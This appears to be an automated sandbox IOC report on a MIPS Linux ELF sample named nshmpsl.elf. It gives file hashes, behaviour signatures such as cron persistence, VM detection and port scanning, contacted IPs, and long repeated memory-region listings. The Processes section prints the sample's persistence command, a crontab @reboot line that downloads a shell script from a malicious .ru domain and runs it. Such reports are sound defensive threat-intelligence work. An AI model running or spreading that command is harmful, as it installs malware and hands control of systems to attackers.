Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

nshmpsl.elf

ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy:	5.512021486961506
Filename:	nshmpsl.elf
Filesize:	101568
MD5:	2ebce2c623cee35100ce645095e0e17a
SHA1:	f8cf8d0db764834f60325110897e8a7cabc96fc4
SHA256:	b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
SHA512:	1c3591b36a1ba39c07054af82aff3311f56c051399d027e800618831f40b2e0b3f121118dbe4a81eb2ec3f4203b127887e05c7164c3af8afd08b10a12d27d00e
SSDEEP:	1536:IHC8aIWiD9AW0FLQ4LBOe+h2s9ieZWUHy6Yb7SWTnvgkwBu:IHC8HWMxhlUeSl7wBu
Preview:	.ELF....................`.@.4...........4. ...(...............@...@..\|...\|....................E...E.,....[..........Q.td...............................<\..'!......'.......................<8..'!... .........9'.. ........................<...'!............`9

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Sample listens on a socket	Networking
Sample tries to kill a process (SIGKILL)	System Summary
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/var/spool/cron/crontabs/tmp.98hekB

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.98hekB
Category:	dropped
Dump:	tmp.98hekB.18.dr
ID:	dr_0
Target ID:	18
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.15976620909095
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQBvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8feHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/tmp/nshmpsl.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/nshmpsl.elf

There are 3 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	18
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.98hekB.18.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

kingstonwikkerink.dyn

193.233.193.45

Details

Name:	kingstonwikkerink.dyn
IP:	193.233.193.45
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

193.233.193.45

kingstonwikkerink.dyn

Russian Federation

91.149.218.232

unknown

Poland

88.151.195.22

unknown

Azerbaijan

81.29.149.178

unknown

Switzerland

91.149.238.18

unknown

Poland

213.182.204.57

unknown

Latvia

51.89.127.38

unknown

France

194.87.198.29

unknown

Russian Federation

195.133.92.51

unknown

Russian Federation

86.107.100.80

unknown

Romania

Memdumps

Base Address

Regiontype

Protect

Malicious

7ffc1b9ec000

page read and write

7f4be0000000

page read and write

56382008e000

page read and write

7f4b60459000

page read and write

7f4be54c6000

page read and write

56381e073000

page execute and read and write

7f4b60418000

page execute read

7f4be0021000

page read and write

7f4be0000000

page read and write

56381c06b000

page read and write

56381bde3000

page execute read

7f4b6045f000

page read and write

7ffc1b9f3000

page execute read

7f4be0021000

page read and write

7f4be0000000

page read and write

56381e073000

page execute and read and write

56381c06b000

page read and write

7f4be42ee000

page read and write

7f4be0021000

page read and write

7ffc1b9f3000

page execute read

7f4be57d8000

page read and write

56381bde3000

page execute read

7ffc1b9ec000

page read and write

7f4be4b04000

page read and write

7f4be4db4000

page read and write

7ffc1b9ec000

page read and write

7f4be5195000

page read and write

7f4b60418000

page execute read

7f4be4db4000

page read and write

7f4be56a7000

page read and write

56381bde3000

page execute read

7f4be581d000

page read and write

7f4be4af6000

page read and write

7f4b6045f000

page read and write

7f4be57d8000

page read and write

7f4be4af6000

page read and write

56381c075000

page read and write

7f4be42ee000

page read and write

56381c06b000

page read and write

7f4b60418000

page execute read

56382008e000

page read and write

7f4be4af6000

page read and write

56381c075000

page read and write

56381c075000

page read and write

7ffc1b9f3000

page execute read

7f4be4db4000

page read and write

7f4be54c6000

page read and write

7f4be56a7000

page read and write

7f4be57d0000

page read and write

7f4be5178000

page read and write

56381e08a000

page read and write

7f4be57d8000

page read and write

7f4be5155000

page read and write

7f4be5155000

page read and write

7f4be5195000

page read and write

7f4be57d0000

page read and write

7f4be42ee000

page read and write

7f4be4b04000

page read and write

7f4be5178000

page read and write

7f4be0000000

page read and write

7f4be57d0000

page read and write

7f4be5155000

page read and write

56381c075000

page read and write

56381c06b000

page read and write

7f4be581d000

page read and write

7f4be4db4000

page read and write

7f4be42ee000

page read and write

7f4b60418000

page execute read

7f4be56a7000

page read and write

7f4b60459000

page read and write

7ffc1b9ec000

page read and write

7f4be5178000

page read and write

56381e08a000

page read and write

56382008e000

page read and write

7f4be5155000

page read and write

7f4b60459000

page read and write

7f4be54c6000

page read and write

56381e08a000

page read and write

56381e073000

page execute and read and write

7f4be0021000

page read and write

7f4be5195000

page read and write

7f4be57d0000

page read and write

7ffc1b9f3000

page execute read

7f4be56a7000

page read and write

7f4be5195000

page read and write

7f4b60459000

page read and write

7f4be4b04000

page read and write

7f4b6045f000

page read and write

56381bde3000

page execute read

56381e073000

page execute and read and write

7f4be581d000

page read and write

56382008e000

page read and write

7f4be54c6000

page read and write

7f4be5178000

page read and write

7f4be581d000

page read and write

7f4be4af6000

page read and write

7f4be4b04000

page read and write

7f4be57d8000

page read and write

7f4b6045f000

page read and write

56381e08a000

page read and write

There are 90 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
nshmpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnshmpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
nshmpsl.elf